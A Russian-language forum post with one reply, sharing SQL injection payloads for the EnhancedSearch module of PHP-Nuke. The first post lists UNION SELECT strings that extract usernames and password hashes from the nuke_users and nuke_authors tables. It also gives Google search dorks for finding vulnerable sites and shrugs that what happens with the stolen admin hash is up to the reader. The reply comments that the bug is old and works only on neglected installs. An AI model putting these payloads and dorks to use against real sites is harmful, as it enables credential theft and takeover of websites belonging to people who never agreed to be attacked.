Бага найдена в модуле поиска (EnhancedSearch). Ввести в поиске : EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* И получим хеш админа. А что с ним делать, это уже ваше дело ))) Небольшие запросы для гугла ) "Enhanced Search Version 2.0: Powered by" inurl:"modules.php?name=EnhancedSearch" Источник : security.nnov.ru
LoFFi, наверно хорошо, что скинул. Может кому пригодится. Но нюку лучше на месте смотреть. Скрипткиддинг такой только на самых запущенных движках проходит. Кстати, эта бага кажись в середине апреля была в nnov опубликована. Известна стала широкому кругу (ну тем, кто нюкой занимается) пораньше. Много с неё сложно поймать. http://www.lock-team.ru/news/world_news/38.html (это далеко не первоисточник, просто первое что по запросу вышло)
